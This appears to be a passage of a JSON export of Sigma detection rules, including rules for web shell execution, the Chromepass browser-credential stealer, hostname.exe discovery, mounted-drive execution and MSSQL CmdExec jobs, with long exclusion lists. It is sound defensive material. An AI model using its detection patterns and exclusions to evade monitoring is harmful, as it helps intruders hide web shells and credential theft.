2>&1'\n\n exclusion_stor2rrd:\n # /bin/sh /data/stor2rrd/stor2rrd-cgi/configuration.sh\n # /bin/sh /data/stor2rrd/stor2rrd-cgi/glob_configuration.sh\n # /bin/sh /data/stor2rrd/stor2rrd-cgi/graphviz.sh\n # /bin/sh /data/stor2rrd/stor2rrd-cgi/overview.sh\n CommandLine:\n - '/bin/sh */stor2rrd/stor2rrd-cgi/configuration.sh'\n - '/bin/sh */stor2rrd/stor2rrd-cgi/glob_configuration.sh'\n - '/bin/sh */stor2rrd/stor2rrd-cgi/graphviz.sh'\n - '/bin/sh */stor2rrd/stor2rrd-cgi/overview.sh'\n\n exclusion_sphinx:\n # /home/httpd/tools/sphinx-manager/web\n CurrentDirectory: '*/sphinx-manager/web'\n # sh -c php /etc/sphinx/sphinx.conf| grep ' log ' | awk -f'=' '{ print $2 }'\n # sh -c php /etc/sphinx/sphinx.conf| grep path | grep force | awk -F'=' '{ print $2 }'\n # sh -c searchd --help | head -n1\n # sh -c git name-rev --name-only HEAD\n # sh -c ps ax | grep indexer | grep -v grep | grep -v sudo\n # sh -c ps ax | grep indexer | grep -v grep | grep -v sudo | grep -E '....\n # sh -c ps ax | grep searchd | grep config | grep -v grep | awk -F'config ' '{print $2}' | tail -n1\n # sh -c tail -n 100 /var/log/sphinx/searchd.log | sort -r\n CommandLine:\n - 'sh -c php /etc/sphinx/sphinx.conf*'\n - 'sh -c searchd --help ? head -n1'\n - 'sh -c git name-rev --name-only HEAD'\n - 'sh -c ps ax ? grep indexer ? grep -v grep ? grep -v sudo*'\n - 'sh -c ps ax ? grep searchd*'\n - 'sh -c tail -n 100 /var/log/sphinx/searchd.log*'\n - 'sh -c searchd --help | head -n1'\n - 'sh -c tail -n 100 /var/log/sphinx/searchd.log | sort -r'\n\n exclusion_gpg_misp:\n # sh -c /usr/bin/gpg --status-fd '3' --command-fd '4' --no-secmem-warning --no-tty --no-default-keyring --no-options --no-permission-warning\n # --exit-on-status-write-error --trust-model always --pinentry-mode loopback --ignore-time-conflict --ignore-valid-from --with-colons --with-fingerprint\n # --with-fingerprint --fixed-list-mode --homedir '/var/www/MISP/.gnupg' --utf8-strings --list-secret-keys -- ....'\n CommandLine|contains|all:\n - '/usr/bin/gpg'\n - '--status-fd'\n - '--command-fd'\n - '--fixed-list-mode'\n - '/var/www/MISP/.gnupg'\n\n exclusion_misp:\n # sh -c /var/www/MISP/app/Console/cake CakeResque.CakeResque start --interval 5 --queue default > /dev/null 2>&1 &\n CommandLine: 'sh -c /var/www/MISP/app/Console/cake CakeResque.CakeResque *'\n\n # https://github.com/matomo-org/matomo\n exclusion_matomo:\n CurrentDirectory|contains: 'matomo'\n CommandLine:\n - 'sh -c */bin/php -r ?echo phpversion();?'\n - \"sh -c ps x 2>/dev/null | awk '! /defunct/ {print $1}' 2>/dev/null\"\n - 'sh -c ps x 2>/dev/null > /dev/null 2>&1; echo $\\?'\n - 'sh -c uname -a 2> /dev/null'\n - 'sh -c id'\n - 'sh -c df -T -t nfs \"*matomo*/tmp/sessions\" 2>&1'\n - 'sh -c /bin/df -kP'\n - 'sh -c /usr/bin/php -q */matomo/console *' # and also with one\n - \"sh -c which 'awk' 2> /dev/null\"\n - 'sh -c ps > /dev/null 2>&1; echo $\\?'\n - \"sh -c which 'ps' 2> /dev/null\"\n\n exclusion_matomo_2:\n CommandLine|contains|all:\n - 'sh -c /usr/bin/php -q /var/www'\n - 'matomo'\n\n exclusion_nextcloud:\n CommandLine:\n - 'sh -c flatpak list --app'\n - 'sh -c kitinerary-extractor'\n - 'sh -c */custom_apps/mail/vendor/christophwurst/kitinerary-bin/src/../bin/kitinerary-extractor'\n\n exclusion_openssl:\n CommandLine:\n - '/bin/sh -c openssl genrsa 1024'\n - '/bin/sh -c openssl x509 -req -sha1 -CA /etc/pki/pulp/ca.crt -CAkey /etc/pki/pulp/ca.key -set_serial *'\n - 'sh -c /usr/bin/openssl ts -reply *'\n - 'sh -c /usr/bin/openssl ts -query *'\n - 'sh -c /usr/bin/openssl version'\n\n exclusion_glpi_plugins:\n CurrentDirectory: '*glpi*'\n CommandLine:\n - 'sh -c /bin/df -hm |grep sd | awk *'\n - 'sh -c /bin/df -h |grep sd | awk *'\n - 'sh -c /usr/bin/free -tm | /usr/bin/awk *'\n - 'sh -c uptime |cut -d\" \" -f4-8'\n - 'sh -c /usr/bin/lsb_release -ds'\n - 'sh -c cat /etc/os-release'\n\n exclusion_librenms:\n CurrentDirectory: '*librenms*' # /opt/librenms/rrd/\n CommandLine: \"sh -c exec '/usr/bin/rrdtool' '-'\"\n\n exclusion_inkscape:\n CommandLine: 'sh -c ?inkscape? ?/tmp/magick-* --export-*=?/tmp/magick-* --export-dpi=* --export-background=?rgb(*)? --export-background-opacity=* > ?/tmp/magick-* 2>&1'\n\n exclusion_exclusion_zf2:\n CommandLine|startswith: 'sh -c php /usr/bin/zf2_cli'\n ParentImage: '/usr/sbin/apache2'\n\n exclusion_zoneminder:\n CommandLine: 'sh -c /usr/bin/zmdc.pl *'\n\n exclusion_unoconv:\n CommandLine|startswith:\n - 'sh -c timeout -k * sudo /usr/local/bin/unoconv.sh /mnt/'\n - 'sh -c exec ?/usr/local/bin/unoconv'\n\n exclusion_pmsi_pilot:\n CommandLine|startswith: 'sh -c test -d ?/var/pmsipilot/datafiles/pmsipilot/'\n\n exclusion_games_dealer:\n CommandLine|startswith: 'sh -c /usr/games/dealer < /tmp/'\n\n exclusion_png2jpg:\n CommandLine|startswith: 'sh -c sudo /usr/local/bin/pdf2jpgConversion2.sh'\n\n exclusion_bridgemaster:\n CommandLine|startswith: 'sh -c ./bridgemaster'\n\n exclusion_java:\n CommandLine|startswith: 'sh -c export LANG=C.UTF-8; java -Djava.awt.headless=true -Dfile.encoding=UTF8 -cp'\n\n exclusion_codeversionmanager:\n CommandLine|startswith:\n - 'sh -c git '\n - 'sh -c svn '\n - 'sh -c cd svn '\n\n exclusion_convertors:\n CommandLine|startswith:\n - 'sh -c gs -sDEVICE=pdfwrite* -dPDFSETTINGS=/default -dNOPAUSE -dQUIET -dBATCH'\n - 'sh -c pdfdeconstruct'\n - 'sh -c convert '\n - 'sh -c /usr/bin/convert '\n - 'sh -c cat ?/tmp/seda2pdf'\n - 'sh -c catdoc -V'\n - 'sh -c exiftool -ver'\n - 'sh -c ffmpeg -version'\n - 'sh -c identify '\n - 'sh -c /usr/bin/identify '\n - 'sh -c ?identify '\n - 'sh -c ?/usr/bin/identify '\n - 'sh -c /usr/bin/cwebp'\n\n exclusion_ccrypt:\n CommandLine|startswith: 'sh -c ccrypt -e /var/www/'\n\n exclusion_nice:\n CommandLine|startswith: 'sh -c nohup nice -n 10'\n\n exclusion_fido:\n CommandLine|startswith: 'sh -c python -m fido.fido -matchprintf'\n\n exclusion_wkhtmltopdf:\n CommandLine|contains: '/bin/wkhtmltopdf'\n\n exclusion_ophtixng:\n CommandLine|startswith: 'sh -c php /var/www/OphtixNG'\n\n exclusion_pastell:\n CommandLine|startswith: 'sh -c *?/var/www/pastell-*/web/api? ; /usr/bin/openssl'\n\n exclusion_squidguard:\n CommandLine|startswith: 'sh -c cd /var/lib/squidguard'\n\n exclusion_kalilab:\n - CommandLine|contains: '/var/www/kalilab/'\n - CurrentDirectory|startswith: '/var/www/kalilab/'\n\n exclusion_sandbox:\n CommandLine|startswith: 'sh -c ?grep? ?BEGIN CERTIFICATE?'\n\n exclusion_unknown_1:\n CommandLine:\n - 'sh -c grep ENCRYPTED \\* -l'\n - 'sh -c stty -a | grep columns'\n\n exclusion_asalae:\n CommandLine|startswith: 'sh -c timeout 10.0 journalctl -u ?asalae-worker-manager.service?'\n\n exclusion_geopsy:\n CommandLine|contains:\n - 'sh -c ?? -v /geopsy/www/geopsy/htdocs/download/releases/geopsypack-'\n - '/geopsy/www/geopsy/htdocs'\n\n exclusion_redpilot:\n CurrentDirectory|contains: 'redpilot'\n CommandLine|contains: 'sh -c libellename'\n\n exclusion_pdftk:\n CommandLine|contains: \"sh -c timeout 30 /usr/bin/pdftk '/u/apps/ikzend2\"\n\n exclusion_httpd_foreground:\n CommandLine|startswith: 'sh -c tput cols'\n ParentCommandLine: '/usr/sbin/httpd -dforeground'\n\n exclusion_bacula:\n CommandLine|startswith: 'sh -c sudo /opt/bacula/bin/bconsole -c '\n\n exclusion_squidgard:\n CommandLine|contains:\n - '/usr/bin/squidguard '\n - '/var/log/squidguard/'\n - '/var/lib/squidguard/'\n\n exclusion_webkiosk_plugin:\n CurrentDirectory: '/var/www/webkiosk-*/'\n CommandLine: 'sh -c *'\n\n exclusion_moodle:\n CommandLine:\n - '*/moodledata/*'\n - 'sh -c ?/usr/bin/gs? -q -sDEVICE=*'\n - 'sh -c ?/usr/bin/convert? *'\n - 'sh -c ?/usr/bin/dvips? *'\n - 'sh -c ?/usr/bin/latex? *'\n - 'sh -c ?latex? *'\n\n exclusion_plz_sandbox:\n CommandLine: 'sh -c */tmp/plz_sandbox/*'\n\n # https://memcourrier.edissyum.com/\n exclusion_memcourrier:\n CurrentDirectory: '/var/www/mem_courrier/'\n CommandLine:\n - 'sh -c HOME=/tmp convert -thumbnail * -background white -alpha remove *'\n - 'sh -c php src/app/convert/scripts/FullTextScript.php --customId * --resId * --collId * --userId * > /dev/null &'\n - 'sh -c nc -vz -w 5 * 2>&1'\n - 'sh -c whereis xvfb-run'\n - 'sh -c xvfb-run -a -e /dev/stderr wkhtmltopdf -B 10mm -L 10mm -R 10mm -T 10mm --load-error-handling ignore --load-media-error-handling ignore --encoding utf-8 *'\n - 'sh -c php src/app/email/scripts/sendEmail.php *'\n - 'sh -c crontab -l'\n - 'sh -c pdfunite ?/var/docservers/mem/convert_mlb/*.pdf? *'\n - 'sh -c crontab /tmp/crontab.txt'\n\n exclusion_libreoffice:\n CommandLine|contains|all:\n - ' /usr/bin/libreoffice '\n - ' --headless '\n\n condition: 1 of selection_parent_* and selection_shell_execution and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb325077-7493-4f82-9b3f-208764d322eb",
"rule_name": "Possible Web Shell Execution",
"rule_description": "Detects the execution of a suspicious shell process by a common web server software likely related to a web shell or a command injection via a vulnerable application.\nAdversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.\nAdversaries may also backdoor web servers with web shells to establish persistent access to systems.\nIt is recommended to analyze the command-line as well as to correlate this alert with other commands executed around it from the web server to determine their legitimacy.\n",
"rule_creation_date": "2021-09-17",
"rule_modified_date": "2026-01-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1203",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb41fe42-89d5-48a3-a7ee-8e098678f7ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296063Z",
"creation_date": "2026-03-23T11:45:35.296066Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296073Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/darkarp/chromepass",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_chromepass.yml",
"content": "title: Chromepass Hacktool\nid: cb41fe42-89d5-48a3-a7ee-8e098678f7ff\ndescription: |\n Detects a Chromepass generated binary being executed.\n Chromepass is a python-based framework that generates Rust binaries that extract and exfiltrate information from Chrome-based browsers.\n It is recommended to investigate the process performing this action to determine its legitimacy.\n If you assume this to be a breach, it is recommended to rotate the credentials used by the affected user.\nreferences:\n - https://github.com/darkarp/chromepass\n - https://attack.mitre.org/techniques/T1005/\ndate: 2026/01/27\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.t1185\n - attack.discovery\n - attack.t1217\n - attack.privilege_escalation\n - attack.t1555.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Chromepass\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - Product: 'chromepass'\n - Description: 'chromepass'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb41fe42-89d5-48a3-a7ee-8e098678f7ff",
"rule_name": "Chromepass Hacktool",
"rule_description": "Detects a Chromepass generated binary being executed.\nChromepass is a python-based framework that generates Rust binaries that extract and exfiltrate information from Chrome-based browsers.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\nIf you assume this to be a breach, it is recommended to rotate the credentials used by the affected user.\n",
"rule_creation_date": "2026-01-27",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1185",
"attack.t1217",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb4bfe98-8568-4057-97e4-e71a345c4957",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622760Z",
"creation_date": "2026-03-23T11:45:34.622762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622766Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1082/"
],
"name": "t1082_hostname_windows.yml",
"content": "title: Hostname Execution\nid: cb4bfe98-8568-4057-97e4-e71a345c4957\ndescription: |\n Detects the execution of hostname.exe, which may be exploited by attackers to gather information about a system during the early stages of an attack.\n It is recommended to investigate the process execution context and correlate with other alerts to determine if the use of hostname.exe is legitimate or part of a broader malicious activity, such as information gathering or lateral movement.\nreferences:\n - https://attack.mitre.org/techniques/T1082/\ndate: 2022/12/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'hostname.exe'\n\n selection_hostname_1:\n ParentCommandLine:\n - 'cmd.exe /c hostname'\n - 'cmd.exe /c hostname.exe'\n GrandparentImage|endswith:\n - '\\powershell.exe'\n - '\\wsmprovhost.exe'\n\n selection_hostname_2:\n CommandLine:\n - 'hostname'\n - 'hostname.exe'\n IntegrityLevel: 'System'\n\n selection_injection:\n ParentImage|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n filter_injection:\n - ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n - '?:\\Windows\\SysWOW64\\sihost.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n - ParentCommandLine:\n - '?:\\WINDOWS\\system32\\wsmprovhost.exe -Embedding'\n - '?:\\WINDOWS\\SysWOW64\\wsmprovhost.exe -Embedding'\n - '?:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding'\n - '?:\\Windows\\SysWOW64\\wbem\\wmiprvse.exe -secured -Embedding'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\IBM\\InformationServer\\Server\\DSEngine\\bin\\uvsh.exe'\n - '?:\\Program Files (x86)\\BigFix Enterprise\\BES Client\\BESClient.exe'\n - '\\IBM\\IEM\\BESClient.exe|?:\\Windows\\System32\\services.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n - '?:\\Windows\\ADDMRemQuery_x86_64_v2.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - '\\bin\\zabbix_agentd.exe|?:\\Windows\\System32\\services.exe'\n - '\\PhenixServer\\GED\\TomcatGED\\bin\\tomcat?.exe'\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe'\n - '\\asys\\progress\\openedge\\bin\\_progres.exe'\n - '\\Digitech\\WebDelib\\Apache-Tomcat\\bin\\WebDelibTomcat.exe'\n - '\\hardis\\reflex\\product\\windows\\ADELIWS_WINDOWS\\win64\\JavaService.exe'\n - '?:\\Windows\\Prey\\wpxsvc.exe'\n\n exclusion_commandline:\n ParentCommandLine|contains: 'cmd /V:ON /E:ON /D /C (hostname) 1>C:\\Windows\\TEMP\\sf_proc_00.out 2>C:\\Windows\\TEMP\\sf_proc_00.err'\n\n exclusion_carestream:\n - CurrentDirectory:\n - '?:\\Program Files\\Carestream\\Smart Link Agent\\Services\\bin\\'\n - '?:\\Program Files (x86)\\Carestream\\Smart Link Agent\\Services\\bin\\'\n - '?:\\Program Files\\Carestream\\System5\\syscheck\\'\n - ParentCommandLine|contains:\n - 'perl *\\System5\\nagios\\scripts\\'\n - 'perl.exe *\\System5\\syscheck\\'\n - 'perl */syscheck/syscheck.pl'\n - 'perl *\\System5\\syscheck\\syscheck.pl'\n - 'perl*C:\\PROGRA~1\\CAREST~1\\System5\\'\n\n exclusion_neem:\n CurrentDirectory:\n - '?:\\Program Files\\Apache Software Foundation\\Apache*\\Neem\\Neem'\n - '?:\\Program Files (x86)\\Apache Software Foundation\\Apache*\\Neem\\Neem'\n\n exclusion_tssv2:\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains: '\\TSSv2.ps1'\n\n exclusion_chronos:\n CurrentDirectory:\n - '*\\Asys\\Chronos\\Client\\'\n - '?:\\Asys\\Environnements\\\\*'\n\n exclusion_rider:\n ParentImage|endswith: '\\JetBrains\\Toolbox\\apps\\Rider\\\\*\\bin\\rider64.exe'\n\n exclusion_system_center:\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentCommandLine: '?:\\Program Files\\Microsoft System Center ????\\DPM\\DPM\\bin\\msdpm.exe'\n\n exclusion_evtexport:\n ParentCommandLine|startswith: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $hostname=hostname;Get-winEvent -filterHashTable'\n\n exclusion_dbspicam:\n GrandparentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c dbspicam *'\n\n exclusion_hp:\n Ancestors|contains: '?:\\Program Files\\HP\\HP BTO Software\\lbin\\eaagt\\opcacta.exe'\n\n exclusion_manageengine1:\n ParentCommandLine: '*;../lib/AdventNetUpdateManagerInstaller.jar;*'\n GrandparentImage: '*\\bin\\wrapper.exe'\n exclusion_manageengine2:\n Ancestors|contains: '|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcondemand.exe|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe|'\n\n exclusion_winrm:\n Ancestors:\n - '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_ricoh:\n CurrentDirectory: '?:\\Program Files\\RICOH\\TotalFlow PM\\'\n\n exclusion_schedule:\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - GrandparentCommandLine: '?:\\WINDOWS\\SYSTEM32\\cmd.exe /c ?:\\\\*.bat'\n Ancestors: '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_intersystems:\n ProcessGrandparentOriginalFileName:\n - 'Cache.exe'\n - 'irisdb.exe'\n ProcessGrandparentCompany: 'InterSystems'\n\n condition: selection and ((1 of selection_hostname_*) or (selection_injection and not filter_injection)) and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb4bfe98-8568-4057-97e4-e71a345c4957",
"rule_name": "Hostname Execution",
"rule_description": "Detects the execution of hostname.exe, which may be exploited by attackers to gather information about a system during the early stages of an attack.\nIt is recommended to investigate the process execution context and correlate with other alerts to determine if the use of hostname.exe is legitimate or part of a broader malicious activity, such as information gathering or lateral movement.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb59ec57-9201-4464-a43b-fc8d339da03f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626206Z",
"creation_date": "2026-03-23T11:45:34.626208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/",
"https://attack.mitre.org/techniques/T1566/001/"
],
"name": "t1204_suspicious_extension_from_mounted_drive.yml",
"content": "title: Suspicious Process Extension from Mounted Drive\nid: cb59ec57-9201-4464-a43b-fc8d339da03f\ndescription: |\n Detects an execution from a mounted drive (ISO, IMG or USB) with a suspicious file extension.\n It is often the result of a spearphishing attack via a removable media such as a USB key or via an ISO or IMG file.\n Attackers may abuse it to gain execution and to avoid detection.\n It is recommended to check the executed binary for malicious behavior or content.\nreferences:\n - https://attack.mitre.org/techniques/T1204/\n - https://attack.mitre.org/techniques/T1566/001/\ndate: 2025/12/10\nmodified: 2026/01/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - attack.initial_access\n - attack.t1566.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ImageDriveType:\n - 'removable'\n - 'disk_image'\n\n filter_legit_extensions:\n Image|endswith:\n - '.exe'\n - '.dll'\n - '.bin'\n - '.sys'\n - '.scr'\n - '.W_X'\n - '.QZ_'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb59ec57-9201-4464-a43b-fc8d339da03f",
"rule_name": "Suspicious Process Extension from Mounted Drive",
"rule_description": "Detects an execution from a mounted drive (ISO, IMG or USB) with a suspicious file extension.\nIt is often the result of a spearphishing attack via a removable media such as a USB key or via an ISO or IMG file.\nAttackers may abuse it to gain execution and to avoid detection.\nIt is recommended to check the executed binary for malicious behavior or content.\n",
"rule_creation_date": "2025-12-10",
"rule_modified_date": "2026-01-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb61697d-e59e-4928-b4cc-0d866202a835",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628291Z",
"creation_date": "2026-03-23T11:45:34.628292Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628297Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-cmdexec-job-step?view=sql-server-2016",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_job_cmdexec.yml",
"content": "title: Execution of a Suspicious MSSQL CmdExec Job\nid: cb61697d-e59e-4928-b4cc-0d866202a835\ndescription: |\n Detects the execution of an MSSQL job using the CmdExec subsystem.\n Attackers may execute a CmdExec job in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-cmdexec-job-step?view=sql-server-2016\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/07/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\sqlagent.exe'\n Image|startswith: '?:\\' # Ignore shares\n\n # This is handled by the rule 801a7bc0-ff7d-467e-91c6-47048e296a77\n filter_cmd:\n Image: '?:\\windows\\system32\\cmd.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_conhost:\n Image:\n - '?:\\WINDOWS\\system32\\conhost.exe'\n - 